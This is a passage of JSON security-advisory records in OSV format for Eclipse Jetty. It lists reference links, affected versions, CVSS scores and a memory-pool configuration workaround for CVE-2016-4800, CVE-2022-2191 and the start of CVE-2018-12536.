"https://lists.apache.org/thread.html/re014afaa14f4df9d33912ab64dc57249e1c170c7448d7175c6d014ff%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re014afaa14f4df9d33912ab64dc57249e1c170c7448d7175c6d014ff@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re03a566114435a8cc8eb72158242b0f560c5eeccbb4ee98d22de8373%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re03a566114435a8cc8eb72158242b0f560c5eeccbb4ee98d22de8373@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3918edd403b0d3857a13ef2ccf3d2bc0231f3b8758e2a5777ea1cd3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3918edd403b0d3857a13ef2ccf3d2bc0231f3b8758e2a5777ea1cd3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a57c7bbf36afc87f8ad9e1dd2f53a08e85a1b531283fc2efce4fe17@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f168fd22c071bdd95ec696e45d2a01e928b9fcadbe94fbabeb1549d%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f168fd22c071bdd95ec696e45d2a01e928b9fcadbe94fbabeb1549d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ffe719224cbe5897f2d06dd22fc77fa12377c39efe9de0c3bf3f837%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r2ffe719224cbe5897f2d06dd22fc77fa12377c39efe9de0c3bf3f837@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c8e5aad1b9afc0c9278430fb571950fbb3ab7dd5d369eb618ffa4%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c8e5aad1b9afc0c9278430fb571950fbb3ab7dd5d369eb618ffa4@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32a25679d97bf5969d130f8e9b3a3fc54110095397d89952e93dbeb0%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32a25679d97bf5969d130f8e9b3a3fc54110095397d89952e93dbeb0@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21%40%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3554a4f192db6008c03f2c6c3e0f1691a9b0d615ce955ef67a876ff7%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3554a4f192db6008c03f2c6c3e0f1691a9b0d615ce955ef67a876ff7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3807b1c54066797c4870e03bd2376bdcce9c7c4e6143499f53cd9ca2%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3807b1c54066797c4870e03bd2376bdcce9c7c4e6143499f53cd9ca2@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r391d20ab6ec03d6becc7a9f0c5e0f45a7ad8af6b996ae0a49839f6bd%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r391d20ab6ec03d6becc7a9f0c5e0f45a7ad8af6b996ae0a49839f6bd@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r39f1b1be8e5c0935f7c515eedf907909474bad15185125daacb36d50%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r39f1b1be8e5c0935f7c515eedf907909474bad15185125daacb36d50@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b7c8bc7a1cb8acdcf7753f436564d289d22f2906e934d1b11de3a40%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b7c8bc7a1cb8acdcf7753f436564d289d22f2906e934d1b11de3a40@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d43529452c5a16338e8267eb911e8aedc64c3241624302e673961c1%40%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d43529452c5a16338e8267eb911e8aedc64c3241624302e673961c1@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46589f4228aabd5fb16135ff5bef0f77f06cdef64f9785ac3349fa02%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r00858fe27ee35ac8fa0e1549d67e0efb789d63b791b5300390bd8480%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r00858fe27ee35ac8fa0e1549d67e0efb789d63b791b5300390bd8480@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01806ad8c9cb0590584baf5b1a60237ad92e4ad5bba082ca04d98179%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r01806ad8c9cb0590584baf5b1a60237ad92e4ad5bba082ca04d98179@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05b7ffde2b8c180709e14bc9ca036407bea3ed9f09b32c4705d23a4a%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05b7ffde2b8c180709e14bc9ca036407bea3ed9f09b32c4705d23a4a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078c1203e48089b2c934b9f86b61bebe8c049e0ea6273b124f349988%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078c1203e48089b2c934b9f86b61bebe8c049e0ea6273b124f349988@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d2de2ab5558da68b504bd30db74da1d97dc152a857f5b7e462288ab%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d2de2ab5558da68b504bd30db74da1d97dc152a857f5b7e462288ab@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r153fbefc27a1b2033692f32ef728ca909a7c7bcc1d21b6c35b38bdd5%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r153fbefc27a1b2033692f32ef728ca909a7c7bcc1d21b6c35b38bdd5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15500b77c52390e2ec048cea4a6b45edf907ea61cd13259193ff8601%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15500b77c52390e2ec048cea4a6b45edf907ea61cd13259193ff8601@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r186748e676e5aeb4eb603361e6367555ae4daecbde55cfd69fa68ec6%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r186748e676e5aeb4eb603361e6367555ae4daecbde55cfd69fa68ec6@%3Cissues.hbase.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r1dd302323c6fe1a542d0371de66a484918fa6c2831ae70d924974bea%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dd302323c6fe1a542d0371de66a484918fa6c2831ae70d924974bea@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22776d06582985cca5bd2a92519a2b13b4cae2d8e087318da03c036d%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22776d06582985cca5bd2a92519a2b13b4cae2d8e087318da03c036d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23ce6b8965e30808daa77a80fcd69833b1fc632d80465d0419eff619%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23ce6b8965e30808daa77a80fcd69833b1fc632d80465d0419eff619@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25a47cd06750ebb4b0f23a9b7a57c209702c8566a4c970a41ac088df%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25a47cd06750ebb4b0f23a9b7a57c209702c8566a4c970a41ac088df@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a541f08bf5f847394297c13a5305c2f76c11e46504ce2a49653890a%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a541f08bf5f847394297c13a5305c2f76c11e46504ce2a49653890a@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a57c7bbf36afc87f8ad9e1dd2f53a08e85a1b531283fc2efce4fe17%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46589f4228aabd5fb16135ff5bef0f77f06cdef64f9785ac3349fa02@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r706562cbbdda569cc556d8a7983d1f9229606e7b51337b820785af26%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706562cbbdda569cc556d8a7983d1f9229606e7b51337b820785af26@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70940cb30356642f0c49af49259680d6bd866f51c4e8de0f8a498fb0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70940cb30356642f0c49af49259680d6bd866f51c4e8de0f8a498fb0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74ab0f5a5f16ca01eb145403ab753df5b348b8c1656d7c8501d0bfc6%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74ab0f5a5f16ca01eb145403ab753df5b348b8c1656d7c8501d0bfc6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7669dab41f2b34d56bb67700d869dc9c025ff72e9468204799f5ac29%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7669dab41f2b34d56bb67700d869dc9c025ff72e9468204799f5ac29@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769e1ba36c607772f7403e7ef2a8ae14d9ddcab4a844f9b28bcf7959%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769e1ba36c607772f7403e7ef2a8ae14d9ddcab4a844f9b28bcf7959@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d37d33f2d68912985daf40203182e3d86f3e81266b7a7f350689eeb%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d37d33f2d68912985daf40203182e3d86f3e81266b7a7f350689eeb@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r81f82ab8ecb83568bafbecf9ce0e73be73980ac1e2af6baf0f344a59%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81f82ab8ecb83568bafbecf9ce0e73be73980ac1e2af6baf0f344a59@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r821bbffb64da0f062b4e72d1aa600b91e26bc82a28298ab159121215%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r821bbffb64da0f062b4e72d1aa600b91e26bc82a28298ab159121215@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850d1d0413716e8ba6d910cae7b01a0e560636e17d664769b5080ca5%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850d1d0413716e8ba6d910cae7b01a0e560636e17d664769b5080ca5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r870bc5e6e354c3e28ea029cb5726c9e8dd2b88cb0f5f7de1d4e3133d%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r870bc5e6e354c3e28ea029cb5726c9e8dd2b88cb0f5f7de1d4e3133d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b2271909dabb45f0f1482ef35ffe106ae4b0cf8e877eb514e9cd421%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b2271909dabb45f0f1482ef35ffe106ae4b0cf8e877eb514e9cd421@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8be8c6f0e404a3179d988eb8afed03ede5f2d5ce986d3f709fb82610%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8be8c6f0e404a3179d988eb8afed03ede5f2d5ce986d3f709fb82610@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8c22aad0711321537183ccddcade7274ebf9dcbdcdacc6c4f90f43de%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c22aad0711321537183ccddcade7274ebf9dcbdcdacc6c4f90f43de@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c839a0d88cd6504abbe72c260371094f47014b2ba08d8d2c0232e3c%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c839a0d88cd6504abbe72c260371094f47014b2ba08d8d2c0232e3c@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489dfc3e259ad3837141985dd9291b93e6b40496cdf58808915d67e9%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489dfc3e259ad3837141985dd9291b93e6b40496cdf58808915d67e9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4981622ba15e8be1657d30b7c85044c7aabe89751fa7324f8604b834%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4981622ba15e8be1657d30b7c85044c7aabe89751fa7324f8604b834@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aff5ca6bc94a6f13ff77914fd960185ab70cd6cebe96fffd74543ac%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aff5ca6bc94a6f13ff77914fd960185ab70cd6cebe96fffd74543ac@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b2e7417a76e3dd4dc9855c6c138c49484080754a09927454f6d89f0%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b2e7417a76e3dd4dc9855c6c138c49484080754a09927454f6d89f0@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r500e22d0aedba1866d0b5e76429b76652a473a0209fa8bf66c9f7aab%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500e22d0aedba1866d0b5e76429b76652a473a0209fa8bf66c9f7aab@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51ec0120b6c849d12fb7fef34db87ef0bf79fcfcd3d703a9800afbba%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51ec0120b6c849d12fb7fef34db87ef0bf79fcfcd3d703a9800afbba@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r543ea0a861a78d84c22656fb76880d7ab327048cf7ee3ccc7281375d%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r543ea0a861a78d84c22656fb76880d7ab327048cf7ee3ccc7281375d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5464405909eb0e1059d5dd57d10c435b9f19325fdebbadb4f1126997%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5464405909eb0e1059d5dd57d10c435b9f19325fdebbadb4f1126997@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c64173663c71f222ea40617ab362d7a590935fb75c18817fdec377e%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c64173663c71f222ea40617ab362d7a590935fb75c18817fdec377e@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e5cb33b545548ec4684d33bd88b05a0ae89c4d7cac93eb63255f58f%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e5cb33b545548ec4684d33bd88b05a0ae89c4d7cac93eb63255f58f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r602683484f607cd1b9598caf3e549fbb01c43fd46a582a32cc3bb545%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602683484f607cd1b9598caf3e549fbb01c43fd46a582a32cc3bb545@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6493e43007f41e34cdbbb66622307fa235374dd2ec5bf52c61075a68%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6493e43007f41e34cdbbb66622307fa235374dd2ec5bf52c61075a68@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66456df852de06a0eed2c0a50252a2c8d360b8a5c005f63c0b1e3d25%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66456df852de06a0eed2c0a50252a2c8d360b8a5c005f63c0b1e3d25@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d5bb60a13e8b539600f86cb72097967b951de5c7ef1e4005cda74a7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d5bb60a13e8b539600f86cb72097967b951de5c7ef1e4005cda74a7@%3Cnotifications.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-226" ], "github_reviewed": true, "github_reviewed_at": "2020-12-02T02:25:41Z", "nvd_published_at": "2020-11-28T01:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-872g-2h8h-362q", "published": "2018-10-19T16:16:16Z", "modified": "2024-02-16T08:22:06.138962Z", "aliases": [ "CVE-2016-4800" ], "summary": "Jetty contains an alias issue that could allow unauthenticated remote code execution due to specially crafted request", "details": "The path normalization mechanism in PathResource class in Eclipse Jetty 9.3.x before 9.3.9 on Windows allows remote attackers to 
bypass protected resource restrictions and other security constraints via a URL with certain escaped characters, related to backslashes.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.9" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.2.v20150730", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-872g-2h8h-362q/GHSA-872g-2h8h-362q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4800" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-872g-2h8h-362q" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190307-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00092.html" }, { "type": "WEB", "url": "http://www.ocert.org/advisories/ocert-2016-001.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/90945" }, { "type": "WEB", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-362" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:37Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8mpp-f3f7-xc28", "published": "2022-07-07T20:55:37Z", "modified": "2024-02-22T05:18:31.237834Z", "aliases": [ "CVE-2022-2191" ], "related": [ "CVE-2022-2191" ], 
"summary": "Jetty SslConnection does not release pooled ByteBuffers in case of errors", "details": "### Impact\n`SslConnection` does not release `ByteBuffer`s in case of error code paths.\nFor example, TLS handshakes that require client-auth with clients that send expired certificates will trigger a TLS handshake errors and the `ByteBuffer`s used to process the TLS handshake will be leaked.\n\n### Workarounds\nConfigure explicitly a `RetainableByteBufferPool` with `max[Heap|Direct]Memory` to limit the amount of memory that is leaked.\nEventually the pool will be full of \"active\" entries (the leaked ones) and will provide `ByteBuffer`s that will be GCed normally.\n\n_With embedded-jetty_\n\n``` java\nint maxBucketSize = 1000;\nlong maxHeapMemory = 128 * 1024L * 1024L; // 128 MB\nlong maxDirectMemory = 128 * 1024L * 1024L; // 128 MB\nRetainableByteBufferPool rbbp = new ArrayRetainableByteBufferPool(0, -1, -1, maxBucketSize, maxHeapMemory, maxDirectMemory);\n\nserver.addBean(rbbp); // make sure the ArrayRetainableByteBufferPool is added before the server is started\nserver.start();\n```\n\n_With jetty-home/jetty-base_\n\nCreate a `${jetty.base}/etc/retainable-byte-buffer-config.xml`\n\n``` xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE Configure PUBLIC \"-//Jetty//Configure//EN\" \"https://www.eclipse.org/jetty/configure_10_0.dtd\"\u003e\n\n\u003cConfigure id=\"Server\" class=\"org.eclipse.jetty.server.Server\"\u003e\n \u003cCall name=\"addBean\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.io.ArrayRetainableByteBufferPool\"\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.minCapacity\" default=\"0\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.factor\" default=\"-1\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxCapacity\" default=\"-1\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"int\"\u003e\u003cProperty 
name=\"jetty.byteBufferPool.maxBucketSize\" default=\"1000\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"long\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxHeapMemory\" default=\"128000000\"/\u003e\u003c/Arg\u003e\n \u003cArg type=\"long\"\u003e\u003cProperty name=\"jetty.byteBufferPool.maxDirectMemory\" default=\"128000000\"/\u003e\u003c/Arg\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n \u003c/Call\u003e\n\u003c/Configure\u003e\n```\n\nAnd then reference it in `${jetty.base}/start.d/retainable-byte-buffer-config.ini`\n\n```\netc/retainable-byte-buffer-config.xml\n```\n\n\n### References\nhttps://github.com/eclipse/jetty.project/issues/8161\n\n### For more information\n* Email us at [security@webtide.com](mailto:security@webtide.com)\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.10" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-8mpp-f3f7-xc28/GHSA-8mpp-f3f7-xc28.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-8mpp-f3f7-xc28/GHSA-8mpp-f3f7-xc28.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-8mpp-f3f7-xc28" }, { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2022-2191" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/issues/8161" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220909-0003" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T20:55:37Z", "nvd_published_at": "2022-07-07T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9rgv-h7x4-qw8g", "published": "2018-10-19T16:15:56Z", "modified": "2024-02-16T08:16:39.738843Z", "aliases": [ "CVE-2018-12536" ], "summary": "Eclipse Jetty Server generates error message containing sensitive information", "details": "In Eclipse Jetty Server, all 9.x versions, on webapps deployed using default Error Handling, when an intentionally bad query arrives that doesn't match a dynamic url-pattern, and is eventually handled by the DefaultServlet's static file serving, the bad characters can trigger a java.nio.file.InvalidPathException which includes the full path to the base resource directory that the DefaultServlet and/or webapp is using. 
